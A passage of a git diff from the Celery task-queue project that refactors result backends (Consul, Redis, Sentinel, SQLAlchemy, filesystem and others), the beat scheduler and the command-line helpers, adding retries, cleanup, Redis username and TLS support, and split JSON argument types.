except ImportError: # pragma: no cover
- cassandra = None # noqa
+ cassandra = None
__all__ = ('CassandraBackend',)
@@ -60,11 +59,9 @@
USING TTL {0}
"""
-if sys.version_info[0] == 3:
- def buf_t(x):
- return bytes(x, 'utf8')
-else:
- buf_t = buffer # noqa
+
+def buf_t(x):
+ return bytes(x, 'utf8')
class CassandraBackend(BaseBackend):
diff --git a/celery/backends/consul.py b/celery/backends/consul.py
index 106953a1271..a4ab148469c 100644
--- a/celery/backends/consul.py
+++ b/celery/backends/consul.py
@@ -31,7 +31,6 @@ class ConsulBackend(KeyValueStoreBackend):
supports_autoexpire = True
- client = None
consistency = 'consistent'
path = None
@@ -40,15 +39,33 @@ def __init__(self, *args, **kwargs):
if self.consul is None:
raise ImproperlyConfigured(CONSUL_MISSING)
-
+ #
+ # By default, for correctness, we use a client connection per
+ # operation. If set, self.one_client will be used for all operations.
+ # This provides for the original behaviour to be selected, and is
+ # also convenient for mocking in the unit tests.
+ #
+ self.one_client = None
self._init_from_params(**parse_url(self.url))
def _init_from_params(self, hostname, port, virtual_host, **params):
logger.debug('Setting on Consul client to connect to %s:%d',
hostname, port)
self.path = virtual_host
- self.client = consul.Consul(host=hostname, port=port,
- consistency=self.consistency)
+ self.hostname = hostname
+ self.port = port
+ #
+ # Optionally, allow a single client connection to be used to reduce
+ # the connection load on Consul by adding a "one_client=1" parameter
+ # to the URL.
+ #
+ if params.get('one_client', None):
+ self.one_client = self.client()
+
+ def client(self):
+ return self.one_client or consul.Consul(host=self.hostname,
+ port=self.port,
+ consistency=self.consistency)
def _key_to_consul_key(self, key):
key = bytes_to_str(key)
@@ -58,7 +75,7 @@ def get(self, key):
key = self._key_to_consul_key(key)
logger.debug('Trying to fetch key %s from Consul', key)
try:
- _, data = self.client.kv.get(key)
+ _, data = self.client().kv.get(key)
return data['Value']
except TypeError:
pass
@@ -84,17 +101,16 @@ def set(self, key, value):
logger.debug('Trying to create Consul session %s with TTL %d',
session_name, self.expires)
- session_id = self.client.session.create(name=session_name,
- behavior='delete',
- ttl=self.expires)
+ client = self.client()
+ session_id = client.session.create(name=session_name,
+ behavior='delete',
+ ttl=self.expires)
logger.debug('Created Consul session %s', session_id)
logger.debug('Writing key %s to Consul', key)
- return self.client.kv.put(key=key,
- value=value,
- acquire=session_id)
+ return client.kv.put(key=key, value=value, acquire=session_id)
def delete(self, key):
key = self._key_to_consul_key(key)
logger.debug('Removing key %s from Consul', key)
- return self.client.kv.delete(key)
+ return self.client().kv.delete(key)
diff --git a/celery/backends/cosmosdbsql.py b/celery/backends/cosmosdbsql.py
index 899cbcb866c..344e46ede0c 100644
--- a/celery/backends/cosmosdbsql.py
+++ b/celery/backends/cosmosdbsql.py
@@ -17,7 +17,7 @@
from pydocumentdb.retry_options import RetryOptions
except ImportError: # pragma: no cover
pydocumentdb = DocumentClient = ConsistencyLevel = PartitionKind = \
- HTTPFailure = ConnectionPolicy = RetryOptions = None # noqa
+ HTTPFailure = ConnectionPolicy = RetryOptions = None
__all__ = ("CosmosDBSQLBackend",)
diff --git a/celery/backends/couchdb.py b/celery/backends/couchdb.py
index 58349aceb69..a4b040dab75 100644
--- a/celery/backends/couchdb.py
+++ b/celery/backends/couchdb.py
@@ -9,7 +9,7 @@
try:
import pycouchdb
except ImportError:
- pycouchdb = None # noqa
+ pycouchdb = None
__all__ = ('CouchBackend',)
@@ -42,7 +42,7 @@ def __init__(self, url=None, *args, **kwargs):
uscheme = uhost = uport = uname = upass = ucontainer = None
if url:
- _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url) # noqa
+ _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url)
ucontainer = ucontainer.strip('/') if ucontainer else None
self.scheme = uscheme or self.scheme
@@ -75,6 +75,7 @@ def connection(self):
return self._connection
def get(self, key):
+ key = bytes_to_str(key)
try:
return self.connection.get(key)['value']
except pycouchdb.exceptions.NotFound:
diff --git a/celery/backends/database/session.py b/celery/backends/database/session.py
index 047a9271d92..415d4623e00 100644
--- a/celery/backends/database/session.py
+++ b/celery/backends/database/session.py
@@ -1,14 +1,26 @@
"""SQLAlchemy session."""
+import time
+
from kombu.utils.compat import register_after_fork
from sqlalchemy import create_engine
-from sqlalchemy.ext.declarative import declarative_base
+from sqlalchemy.exc import DatabaseError
from sqlalchemy.orm import sessionmaker
from sqlalchemy.pool import NullPool
+from celery.utils.time import get_exponential_backoff_interval
+
+try:
+ from sqlalchemy.orm import declarative_base
+except ImportError:
+ # TODO: Remove this once we drop support for SQLAlchemy < 1.4.
+ from sqlalchemy.ext.declarative import declarative_base
+
ResultModelBase = declarative_base()
__all__ = ('SessionManager',)
+PREPARE_MODELS_MAX_RETRIES = 10
+
def _after_fork_cleanup_session(session):
session._after_fork()
@@ -50,7 +62,25 @@ def create_session(self, dburi, short_lived_sessions=False, **kwargs):
def prepare_models(self, engine):
if not self.prepared:
- ResultModelBase.metadata.create_all(engine)
+ # SQLAlchemy will check if the items exist before trying to
+ # create them, which is a race condition. If it raises an error
+ # in one iteration, the next may pass all the existence checks
+ # and the call will succeed.
+ retries = 0
+ while True:
+ try:
+ ResultModelBase.metadata.create_all(engine)
+ except DatabaseError:
+ if retries < PREPARE_MODELS_MAX_RETRIES:
+ sleep_amount_ms = get_exponential_backoff_interval(
+ 10, retries, 1000, True
+ )
+ time.sleep(sleep_amount_ms / 1000)
+ retries += 1
+ else:
+ raise
+ else:
+ break
self.prepared = True
def session_factory(self, dburi, **kwargs):
diff --git a/celery/backends/dynamodb.py b/celery/backends/dynamodb.py
index 25a8e3423c1..4fbd9aaf7d7 100644
--- a/celery/backends/dynamodb.py
+++ b/celery/backends/dynamodb.py
@@ -13,7 +13,7 @@
import boto3
from botocore.exceptions import ClientError
except ImportError: # pragma: no cover
- boto3 = ClientError = None # noqa
+ boto3 = ClientError = None
__all__ = ('DynamoDBBackend',)
diff --git a/celery/backends/elasticsearch.py b/celery/backends/elasticsearch.py
index 886acd02475..c40b15ddec8 100644
--- a/celery/backends/elasticsearch.py
+++ b/celery/backends/elasticsearch.py
@@ -12,7 +12,7 @@
try:
import elasticsearch
except ImportError: # pragma: no cover
- elasticsearch = None # noqa
+ elasticsearch = None
__all__ = ('ElasticsearchBackend',)
@@ -52,7 +52,7 @@ def __init__(self, url=None, *args, **kwargs):
index = doc_type = scheme = host = port = username = password = None
if url:
- scheme, host, port, username, password, path, _ = _parse_url(url) # noqa
+ scheme, host, port, username, password, path, _ = _parse_url(url)
if scheme == 'elasticsearch':
scheme = None
if path:
@@ -199,10 +199,10 @@ def _update(self, id, body, state, **kwargs):
def encode(self, data):
if self.es_save_meta_as_text:
- return KeyValueStoreBackend.encode(self, data)
+ return super().encode(data)
else:
if not isinstance(data, dict):
- return KeyValueStoreBackend.encode(self, data)
+ return super().encode(data)
if data.get("result"):
data["result"] = self._encode(data["result"])[2]
if data.get("traceback"):
@@ -211,14 +211,14 @@ def encode(self, data):
def decode(self, payload):
if self.es_save_meta_as_text:
- return KeyValueStoreBackend.decode(self, payload)
+ return super().decode(payload)
else:
if not isinstance(payload, dict):
- return KeyValueStoreBackend.decode(self, payload)
+ return super().decode(payload)
if payload.get("result"):
- payload["result"] = KeyValueStoreBackend.decode(self, payload["result"])
+ payload["result"] = super().decode(payload["result"])
if payload.get("traceback"):
- payload["traceback"] = KeyValueStoreBackend.decode(self, payload["traceback"])
+ payload["traceback"] = super().decode(payload["traceback"])
return payload
def mget(self, keys):
diff --git a/celery/backends/filesystem.py b/celery/backends/filesystem.py
index 6b937b693b5..6bc6bb141d0 100644
--- a/celery/backends/filesystem.py
+++ b/celery/backends/filesystem.py
@@ -1,6 +1,7 @@
"""File-system result store backend."""
import locale
import os
+from datetime import datetime
from kombu.utils.encoding import ensure_bytes
@@ -38,6 +39,10 @@ def __init__(self, url=None, open=open, unlink=os.unlink, sep=os.sep,
self.url = url
path = self._find_path(url)
+ # Remove forwarding "/" for Windows os
+ if os.name == "nt" and path.startswith("/"):
+ path = path[1:]
+
# We need the path and separator as bytes objects
self.path = path.encode(encoding)
self.sep = sep.encode(encoding)
@@ -90,3 +95,19 @@ def mget(self, keys):
def delete(self, key):
self.unlink(self._filename(key))
+
+ def cleanup(self):
+ """Delete expired meta-data."""
+ if not self.expires:
+ return
+ epoch = datetime(1970, 1, 1, tzinfo=self.app.timezone)
+ now_ts = (self.app.now() - epoch).total_seconds()
+ cutoff_ts = now_ts - self.expires
+ for filename in os.listdir(self.path):
+ for prefix in (self.task_keyprefix, self.group_keyprefix,
+ self.chord_keyprefix):
+ if filename.startswith(prefix):
+ path = os.path.join(self.path, filename)
+ if os.stat(path).st_mtime < cutoff_ts:
+ self.unlink(path)
+ break
diff --git a/celery/backends/mongodb.py b/celery/backends/mongodb.py
index 5ae3ddf8223..b78e4d015b4 100644
--- a/celery/backends/mongodb.py
+++ b/celery/backends/mongodb.py
@@ -13,18 +13,18 @@
try:
import pymongo
except ImportError: # pragma: no cover
- pymongo = None # noqa
+ pymongo = None
if pymongo:
try:
from bson.binary import Binary
except ImportError: # pragma: no cover
- from pymongo.binary import Binary # noqa
- from pymongo.errors import InvalidDocument # noqa
+ from pymongo.binary import Binary
+ from pymongo.errors import InvalidDocument
else: # pragma: no cover
- Binary = None # noqa
+ Binary = None
- class InvalidDocument(Exception): # noqa
+ class InvalidDocument(Exception):
pass
__all__ = ('MongoBackend',)
@@ -202,8 +202,8 @@ def _get_task_meta_for(self, task_id):
'status': obj['status'],
'result': self.decode(obj['result']),
'date_done': obj['date_done'],
- 'traceback': self.decode(obj['traceback']),
- 'children': self.decode(obj['children']),
+ 'traceback': obj['traceback'],
+ 'children': obj['children'],
})
return {'status': states.PENDING, 'result': None}
@@ -248,6 +248,9 @@ def _forget(self, task_id):
def cleanup(self):
"""Delete expired meta-data."""
+ if not self.expires:
+ return
+
self.collection.delete_many(
{'date_done': {'$lt': self.app.now() - self.expires_delta}},
)
diff --git a/celery/backends/redis.py b/celery/backends/redis.py
index 1b9db7433fe..7eedc4c089b 100644
--- a/celery/backends/redis.py
+++ b/celery/backends/redis.py
@@ -7,13 +7,15 @@
from kombu.utils.functional import retry_over_time
from kombu.utils.objects import cached_property
-from kombu.utils.url import _parse_url
+from kombu.utils.url import _parse_url, maybe_sanitize_url
from celery import states
from celery._state import task_join_will_block
from celery.canvas import maybe_signature
-from celery.exceptions import ChordError, ImproperlyConfigured
-from celery.utils.functional import dictfilter
+from celery.exceptions import (BackendStoreError, ChordError,
+ ImproperlyConfigured)
+from celery.result import GroupResult, allow_join_result
+from celery.utils.functional import _regen, dictfilter
from celery.utils.log import get_logger
from celery.utils.time import humanize_seconds
@@ -24,8 +26,8 @@
import redis.connection
from kombu.transport.redis import get_redis_error_classes
except ImportError: # pragma: no cover
- redis = None # noqa
- get_redis_error_classes = None # noqa
+ redis = None
+ get_redis_error_classes = None
try:
import redis.sentinel
@@ -46,13 +48,13 @@
W_REDIS_SSL_CERT_OPTIONAL = """
Setting ssl_cert_reqs=CERT_OPTIONAL when connecting to redis means that \
-celery might not valdate the identity of the redis broker when connecting. \
+celery might not validate the identity of the redis broker when connecting. \
This leaves you vulnerable to man in the middle attacks.
"""
W_REDIS_SSL_CERT_NONE = """
Setting ssl_cert_reqs=CERT_NONE when connecting to redis means that celery \
-will not valdate the identity of the redis broker when connecting. This \
+will not validate the identity of the redis broker when connecting. This \
leaves you vulnerable to man in the middle attacks.
"""
@@ -108,7 +110,8 @@ def _reconnect_pubsub(self):
self._pubsub = self.backend.client.pubsub(
ignore_subscribe_messages=True,
)
- self._pubsub.subscribe(*self.subscribed_to)
+ if self.subscribed_to:
+ self._pubsub.subscribe(*self.subscribed_to)
@contextmanager
def reconnect_on_error(self):
@@ -184,6 +187,7 @@ class RedisBackend(BaseKeyValueStoreBackend, AsyncBackendMixin):
#: :pypi:`redis` client module.
redis = redis
+ connection_class_ssl = redis.SSLConnection if redis else None
#: Maximum number of connections in the pool.
max_connections = None
@@ -191,6 +195,10 @@ class RedisBackend(BaseKeyValueStoreBackend, AsyncBackendMixin):
supports_autoexpire = True
supports_native_join = True
+ #: Maximal length of string value in Redis.
+ #: 512 MB - https://redis.io/topics/data-types
+ _MAX_STR_VALUE_SIZE = 536870912
+
def __init__(self, host=None, port=None, db=None, password=None,
max_connections=None, url=None,
connection_pool=None, **kwargs):
@@ -212,6 +220,7 @@ def __init__(self, host=None, port=None, db=None, password=None,
socket_connect_timeout = _get('redis_socket_connect_timeout')
retry_on_timeout = _get('redis_retry_on_timeout')
socket_keepalive = _get('redis_socket_keepalive')
+ health_check_interval = _get('redis_backend_health_check_interval')
self.connparams = {
'host': _get('redis_host') or 'localhost',
@@ -225,6 +234,20 @@ def __init__(self, host=None, port=None, db=None, password=None,
socket_connect_timeout and float(socket_connect_timeout),
}
+ username = _get('redis_username')
+ if username:
+ # We're extra careful to avoid including this configuration value
+ # if it wasn't specified since older versions of py-redis
+ # don't support specifying a username.
+ # Only Redis>6.0 supports username/password authentication.
+
+ # TODO: Include this in connparams' definition once we drop
+ # support for py-redis<3.4.0.
+ self.connparams['username'] = username
+
+ if health_check_interval:
+ self.connparams["health_check_interval"] = health_check_interval
+
# absent in redis.connection.UnixDomainSocketConnection
if socket_keepalive:
self.connparams['socket_keepalive'] = socket_keepalive
@@ -235,7 +258,7 @@ def __init__(self, host=None, port=None, db=None, password=None,
ssl = _get('redis_backend_use_ssl')
if ssl:
self.connparams.update(ssl)
- self.connparams['connection_class'] = redis.SSLConnection
+ self.connparams['connection_class'] = self.connection_class_ssl
if url:
self.connparams = self._params_from_url(url, self.connparams)
@@ -244,7 +267,7 @@ def __init__(self, host=None, port=None, db=None, password=None,
# redis_backend_use_ssl dict, check ssl_cert_reqs is valid. If set
# via query string ssl_cert_reqs will be a string so convert it here
if ('connection_class' in self.connparams and
- self.connparams['connection_class'] is redis.SSLConnection):
+ issubclass(self.connparams['connection_class'], redis.SSLConnection)):
ssl_cert_reqs_missing = 'MISSING'
ssl_string_to_constant = {'CERT_REQUIRED': CERT_REQUIRED,
'CERT_OPTIONAL': CERT_OPTIONAL,
@@ -274,11 +297,11 @@ def __init__(self, host=None, port=None, db=None, password=None,
)
def _params_from_url(self, url, defaults):
- scheme, host, port, _, password, path, query = _parse_url(url)
+ scheme, host, port, username, password, path, query = _parse_url(url)
connparams = dict(
defaults, **dictfilter({
- 'host': host, 'port': port, 'password': password,
- 'db': query.pop('virtual_host', None)})
+ 'host': host, 'port': port, 'username': username,
+ 'password': password, 'db': query.pop('virtual_host', None)})
)
if scheme == 'socket':
@@ -363,6 +386,9 @@ def on_connection_error(self, max_retries, exc, intervals, retries):
return tts
def set(self, key, value, **retry_policy):
+ if isinstance(value, str) and len(value) > self._MAX_STR_VALUE_SIZE:
+ raise BackendStoreError('value too large for Redis backend')
+
return self.ensure(self._set, (key, value), **retry_policy)
def _set(self, key, value):
@@ -400,13 +426,20 @@ def _unpack_chord_result(self, tup, decode,
raise ChordError(f'Dependency {tid} raised {retval!r}')
return retval
- def apply_chord(self, header_result, body, **kwargs):
- # Overrides this to avoid calling GroupResult.save
- # pylint: disable=method-hidden
- # Note that KeyValueStoreBackend.__init__ sets self.apply_chord
- # if the implements_incr attr is set. Redis backend doesn't set
- # this flag.
- pass
+ def set_chord_size(self, group_id, chord_size):
+ self.set(self.get_key_for_group(group_id, '.s'), chord_size)
+
+ def apply_chord(self, header_result_args, body, **kwargs):
+ # If any of the child results of this chord are complex (ie. group
+ # results themselves), we need to save `header_result` to ensure that
+ # the expected structure is retained when we finish the chord and pass
+ # the results onward to the body in `on_chord_part_return()`. We don't
+ # do this is all cases to retain an optimisation in the common case
+ # where a chord header is comprised of simple result objects.
+ if not isinstance(header_result_args[1], _regen):
+ header_result = self.app.GroupResult(*header_result_args)
+ if any(isinstance(nr, GroupResult) for nr in header_result.results):
+ header_result.save(backend=self)
@cached_property
def _chord_zset(self):
@@ -428,6 +461,7 @@ def on_chord_part_return(self, request, state, result,
client = self.client
jkey = self.get_key_for_group(gid, '.j')
tkey = self.get_key_for_group(gid, '.t')
+ skey = self.get_key_for_group(gid, '.s')
result = self.encode_result(result, state)
encoded = self.encode([1, tid, state, result])
with client.pipeline() as pipe:
@@ -435,50 +469,80 @@ def on_chord_part_return(self, request, state, result,
pipe.zadd(jkey, {encoded: group_index}).zcount(jkey, "-inf", "+inf")
if self._chord_zset
else pipe.rpush(jkey, encoded).llen(jkey)
- ).get(tkey)
- if self.expires is not None:
+ ).get(tkey).get(skey)
+ if self.expires:
pipeline = pipeline \
.expire(jkey, self.expires) \
- .expire(tkey, self.expires)
+ .expire(tkey, self.expires) \
+ .expire(skey, self.expires)
- _, readycount, totaldiff = pipeline.execute()[:3]
+ _, readycount, totaldiff, chord_size_bytes = pipeline.execute()[:4]
totaldiff = int(totaldiff or 0)
- try:
- callback = maybe_signature(request.chord, app=app)
- total = callback['chord_size'] + totaldiff
- if readycount == total:
- decode, unpack = self.decode, self._unpack_chord_result
- with client.pipeline() as pipe:
- if self._chord_zset:
- pipeline = pipe.zrange(jkey, 0, -1)
+ if chord_size_bytes:
+ try:
+ callback = maybe_signature(request.chord, app=app)
+ total = int(chord_size_bytes) + totaldiff
+ if readycount == total:
+ header_result = GroupResult.restore(gid)
+ if header_result is not None:
+ # If we manage to restore a `GroupResult`, then it must
+ # have been complex and saved by `apply_chord()` earlier.
+ #
+ # Before we can join the `GroupResult`, it needs to be
+ # manually marked as ready to avoid blocking
+ header_result.on_ready()
+ # We'll `join()` it to get the results and ensure they are
+ # structured as intended rather than the flattened version
+ # we'd construct without any other information.
+ join_func = (
+ header_result.join_native
+ if header_result.supports_native_join
+ else header_result.join
+ )
+ with allow_join_result():
+ resl = join_func(
+ timeout=app.conf.result_chord_join_timeout,
+ propagate=True
+ )
else:
- pipeline = pipe.lrange(jkey, 0, total)
- resl, = pipeline.execute()
- try:
- callback.delay([unpack(tup, decode) for tup in resl])
- with client.pipeline() as pipe:
- _, _ = pipe \
- .delete(jkey) \
- .delete(tkey) \
- .execute()
- except Exception as exc: # pylint: disable=broad-except
- logger.exception(
- 'Chord callback for %r raised: %r', request.group, exc)
- return self.chord_error_from_stack(
- callback,
- ChordError(f'Callback error: {exc!r}'),
- )
- except ChordError as exc:
- logger.exception('Chord %r raised: %r', request.group, exc)
- return self.chord_error_from_stack(callback, exc)
- except Exception as exc: # pylint: disable=broad-except
- logger.exception('Chord %r raised: %r', request.group, exc)
- return self.chord_error_from_stack(
- callback,
- ChordError(f'Join error: {exc!r}'),
- )
+ # Otherwise simply extract and decode the results we
+ # stashed along the way, which should be faster for large
+ # numbers of simple results in the chord header.
+ decode, unpack = self.decode, self._unpack_chord_result
+ with client.pipeline() as pipe:
+ if self._chord_zset:
+ pipeline = pipe.zrange(jkey, 0, -1)
+ else:
+ pipeline = pipe.lrange(jkey, 0, total)
+ resl, = pipeline.execute()
+ resl = [unpack(tup, decode) for tup in resl]
+ try:
+ callback.delay(resl)
+ except Exception as exc: # pylint: disable=broad-except
+ logger.exception(
+ 'Chord callback for %r raised: %r', request.group, exc)
+ return self.chord_error_from_stack(
+ callback,
+ ChordError(f'Callback error: {exc!r}'),
+ )
+ finally:
+ with client.pipeline() as pipe:
+ pipe \
+ .delete(jkey) \
+ .delete(tkey) \
+ .delete(skey) \
+ .execute()
+ except ChordError as exc:
+ logger.exception('Chord %r raised: %r', request.group, exc)
+ return self.chord_error_from_stack(callback, exc)
+ except Exception as exc: # pylint: disable=broad-except
+ logger.exception('Chord %r raised: %r', request.group, exc)
+ return self.chord_error_from_stack(
+ callback,
+ ChordError(f'Join error: {exc!r}'),
+ )
def _create_client(self, **params):
return self._get_client()(
@@ -508,10 +572,26 @@ def __reduce__(self, args=(), kwargs=None):
)
+if getattr(redis, "sentinel", None):
+ class SentinelManagedSSLConnection(
+ redis.sentinel.SentinelManagedConnection,
+ redis.SSLConnection):
+ """Connect to a Redis server using Sentinel + TLS.
+
+ Use Sentinel to identify which Redis server is the current master
+ to connect to and when connecting to the Master server, use an
+ SSL Connection.
+ """
+
+
class SentinelBackend(RedisBackend):
"""Redis sentinel task result store."""
+ # URL looks like `sentinel://0.0.0.0:26347/3;sentinel://0.0.0.0:26348/3`
+ _SERVER_URI_SEPARATOR = ";"
+
sentinel = getattr(redis, "sentinel", None)
+ connection_class_ssl = SentinelManagedSSLConnection if sentinel else None
def __init__(self, *args, **kwargs):
if self.sentinel is None:
@@ -519,9 +599,28 @@ def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
+ def as_uri(self, include_password=False):
+ """Return the server addresses as URIs, sanitizing the password or not."""
+ # Allow superclass to do work if we don't need to force sanitization
+ if include_password:
+ return super().as_uri(
+ include_password=include_password,
+ )
+ # Otherwise we need to ensure that all components get sanitized rather
+ # by passing them one by one to the `kombu` helper
+ uri_chunks = (
+ maybe_sanitize_url(chunk)
+ for chunk in (self.url or "").split(self._SERVER_URI_SEPARATOR)
+ )
+ # Similar to the superclass, strip the trailing slash from URIs with
+ # all components empty other than the scheme
+ return self._SERVER_URI_SEPARATOR.join(
+ uri[:-1] if uri.endswith(":///") else uri
+ for uri in uri_chunks
+ )
+
def _params_from_url(self, url, defaults):
- # URL looks like sentinel://0.0.0.0:26347/3;sentinel://0.0.0.0:26348/3.
- chunks = url.split(";")
+ chunks = url.split(self._SERVER_URI_SEPARATOR)
connparams = dict(defaults, hosts=[])
for chunk in chunks:
data = super()._params_from_url(
diff --git a/celery/backends/rpc.py b/celery/backends/rpc.py
index 9b851db4de8..399c1dc7a20 100644
--- a/celery/backends/rpc.py
+++ b/celery/backends/rpc.py
@@ -338,5 +338,5 @@ def binding(self):
@cached_property
def oid(self):
- # cached here is the app OID: name of queue we receive results on.
- return self.app.oid
+ # cached here is the app thread OID: name of queue we receive results on.
+ return self.app.thread_oid
diff --git a/celery/backends/s3.py b/celery/backends/s3.py
index c102073ccca..ea04ae373d1 100644
--- a/celery/backends/s3.py
+++ b/celery/backends/s3.py
@@ -72,6 +72,7 @@ def set(self, key, value):
s3_object.put(Body=value)
def delete(self, key):
+ key = bytes_to_str(key)
s3_object = self._get_s3_object(key)
s3_object.delete()
diff --git a/celery/beat.py b/celery/beat.py
index 3e1d31a59ac..d8a4fc9e8b2 100644
--- a/celery/beat.py
+++ b/celery/beat.py
@@ -203,6 +203,24 @@ def __ne__(self, other):
return not self == other
+def _evaluate_entry_args(entry_args):
+ if not entry_args:
+ return []
+ return [
+ v() if isinstance(v, BeatLazyFunc) else v
+ for v in entry_args
+ ]
+
+
+def _evaluate_entry_kwargs(entry_kwargs):
+ if not entry_kwargs:
+ return {}
+ return {
+ k: v() if isinstance(v, BeatLazyFunc) else v
+ for k, v in entry_kwargs.items()
+ }
+
+
class Scheduler:
"""Scheduler for periodic tasks.
@@ -380,8 +398,8 @@ def apply_async(self, entry, producer=None, advance=True, **kwargs):
task = self.app.tasks.get(entry.task)
try:
- entry_args = [v() if isinstance(v, BeatLazyFunc) else v for v in (entry.args or [])]
- entry_kwargs = {k: v() if isinstance(v, BeatLazyFunc) else v for k, v in entry.kwargs.items()}
+ entry_args = _evaluate_entry_args(entry.args)
+ entry_kwargs = _evaluate_entry_kwargs(entry.kwargs)
if task:
return task.apply_async(entry_args, entry_kwargs,
producer=producer,
@@ -494,7 +512,7 @@ class PersistentScheduler(Scheduler):
def __init__(self, *args, **kwargs):
self.schedule_filename = kwargs.get('schedule_filename')
- Scheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def _remove_db(self):
for suffix in self.known_suffixes:
@@ -685,7 +703,7 @@ def stop(self):
except NotImplementedError: # pragma: no cover
_Process = None
else:
- class _Process(Process): # noqa
+ class _Process(Process):
def __init__(self, app, **kwargs):
super().__init__()
diff --git a/celery/bin/amqp.py b/celery/bin/amqp.py
index e8b7f24066c..d94c91607bd 100644
--- a/celery/bin/amqp.py
+++ b/celery/bin/amqp.py
@@ -8,6 +8,8 @@
__all__ = ('amqp',)
+from celery.bin.base import handle_preload_options
+
def dump_message(message):
if message is None:
@@ -24,6 +26,10 @@ def __init__(self, cli_context):
self.channel = None
self.reconnect()
+ @property
+ def app(self):
+ return self.cli_context.app
+
def respond(self, retval):
if isinstance(retval, str):
self.cli_context.echo(retval)
@@ -54,6 +60,7 @@ def reconnect(self):
@click.group(invoke_without_command=True)
@click.pass_context
+@handle_preload_options
def amqp(ctx):
"""AMQP Administration Shell.
diff --git a/celery/bin/base.py b/celery/bin/base.py
index 9429900a957..30358dd8a9a 100644
--- a/celery/bin/base.py
+++ b/celery/bin/base.py
@@ -1,6 +1,8 @@
"""Click customizations for Celery."""
import json
+import numbers
from collections import OrderedDict
+from functools import update_wrapper
from pprint import pformat
import click
@@ -8,6 +10,7 @@
from kombu.utils.objects import cached_property
from celery._state import get_current_app
+from celery.signals import user_preload_options
from celery.utils import text
from celery.utils.log import mlevel
from celery.utils.time import maybe_iso8601
@@ -39,8 +42,7 @@ def __init__(self, app, no_color, workdir, quiet=False):
@cached_property
def OK(self):
- return self.style("OK", fg="green", bold=True) \
-
+ return self.style("OK", fg="green", bold=True)
@cached_property
def ERROR(self):
@@ -72,7 +74,7 @@ def error(self, message=None, **kwargs):
kwargs['color'] = False
click.echo(message, **kwargs)
else:
- click.echo(message, **kwargs)
+ click.secho(message, **kwargs)
def pretty(self, n):
if isinstance(n, list):
@@ -114,13 +116,33 @@ def say_chat(self, direction, title, body='', show_body=False):
self.echo(body)
+def handle_preload_options(f):
+ """Extract preload options and return a wrapped callable."""
+ def caller(ctx, *args, **kwargs):
+ app = ctx.obj.app
+
+ preload_options = [o.name for o in app.user_options.get('preload', [])]
+
+ if preload_options:
+ user_options = {
+ preload_option: kwargs[preload_option]
+ for preload_option in preload_options
+ }
+
+ user_preload_options.send(sender=f, app=app, options=user_options)
+
+ return f(ctx, *args, **kwargs)
+
+ return update_wrapper(caller, f)
+
+
class CeleryOption(click.Option):
"""Customized option for Celery."""
- def get_default(self, ctx):
+ def get_default(self, ctx, *args, **kwargs):
if self.default_value_from_context:
self.default = ctx.obj[self.default_value_from_context]
- return super().get_default(ctx)
+ return super().get_default(ctx, *args, **kwargs)
def __init__(self, *args, **kwargs):
"""Initialize a Celery option."""
@@ -169,20 +191,48 @@ class CommaSeparatedList(ParamType):
name = "comma separated list"
def convert(self, value, param, ctx):
- return set(text.str_to_list(value))
+ return text.str_to_list(value)
-class Json(ParamType):
- """JSON formatted argument."""
+class JsonArray(ParamType):
+ """JSON formatted array argument."""
- name = "json"
+ name = "json array"
def convert(self, value, param, ctx):
+ if isinstance(value, list):
+ return value
+
try:
- return json.loads(value)
+ v = json.loads(value)
except ValueError as e:
self.fail(str(e))
+ if not isinstance(v, list):
+ self.fail(f"{value} was not an array")
+
+ return v
+
+
+class JsonObject(ParamType):
+ """JSON formatted object argument."""
+
+ name = "json object"
+
+ def convert(self, value, param, ctx):
+ if isinstance(value, dict):
+ return value
+
+ try:
+ v = json.loads(value)
+ except ValueError as e:
+ self.fail(str(e))
+
+ if not isinstance(v, dict):
+ self.fail(f"{value} was not an object")
+
+ return v
+
class ISO8601DateTime(ParamType):
"""ISO 8601 Date Time argument."""
@@ -221,11 +271,16 @@ def __init__(self):
super().__init__(('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL', 'FATAL'))
def convert(self, value, param, ctx):
+ if isinstance(value, numbers.Integral):
+ return value
+
+ value = value.upper()
value = super().convert(value, param, ctx)
return mlevel(value)
-JSON = Json()
+JSON_ARRAY = JsonArray()
+JSON_OBJECT = JsonObject()
ISO8601 = ISO8601DateTime()
ISO8601_OR_FLOAT = ISO8601DateTimeOrFloat()
LOG_LEVEL = LogLevel()
diff --git a/celery/bin/beat.py b/celery/bin/beat.py
index 54a74c14c7e..145b44e9720 100644
--- a/celery/bin/beat.py
+++ b/celery/bin/beat.py
@@ -3,7 +3,8 @@
import click
-from celery.bin.base import LOG_LEVEL, CeleryDaemonCommand, CeleryOption
+from celery.bin.base import (LOG_LEVEL, CeleryDaemonCommand, CeleryOption,
+ handle_preload_options)
from celery.platforms import detached, maybe_drop_privileges
@@ -43,6 +44,7 @@
help_group="Beat Options",
help="Logging level.")
@click.pass_context
+@handle_preload_options
def beat(ctx, detach=False, logfile=None, pidfile=None, uid=None,
gid=None, umask=None, workdir=None, **kwargs):
"""Start the beat periodic task scheduler."""
diff --git a/celery/bin/call.py b/celery/bin/call.py
index c2744a4cd28..a04651bdd4f 100644
--- a/celery/bin/call.py
+++ b/celery/bin/call.py
@@ -1,22 +1,24 @@
"""The ``celery call`` program used to send tasks from the command-line."""
import click
-from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON, CeleryCommand,
- CeleryOption)
+from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON_ARRAY,
+ JSON_OBJECT, CeleryCommand, CeleryOption,
+ handle_preload_options)
+@click.command(cls=CeleryCommand)
@click.argument('name')
@click.option('-a',
'--args',
cls=CeleryOption,
- type=JSON,
+ type=JSON_ARRAY,
default='[]',
help_group="Calling Options",
help="Positional arguments.")
@click.option('-k',
'--kwargs',
cls=CeleryOption,
- type=JSON,
+ type=JSON_OBJECT,
default='{}',
help_group="Calling Options",
help="Keyword arguments.")
@@ -52,8 +54,8 @@
cls=CeleryOption,
help_group="Routing Options",
help="custom routing key.")
-@click.command(cls=CeleryCommand)
@click.pass_context
+@handle_preload_options
def call(ctx, name, args, kwargs, eta, countdown, expires, serializer, queue, exchange, routing_key):
"""Call a task by name."""
task_id = ctx.obj.app.send_task(
diff --git a/celery/bin/celery.py b/celery/bin/celery.py
index 4f7c95d065c..c6b862d0f10 100644
--- a/celery/bin/celery.py
+++ b/celery/bin/celery.py
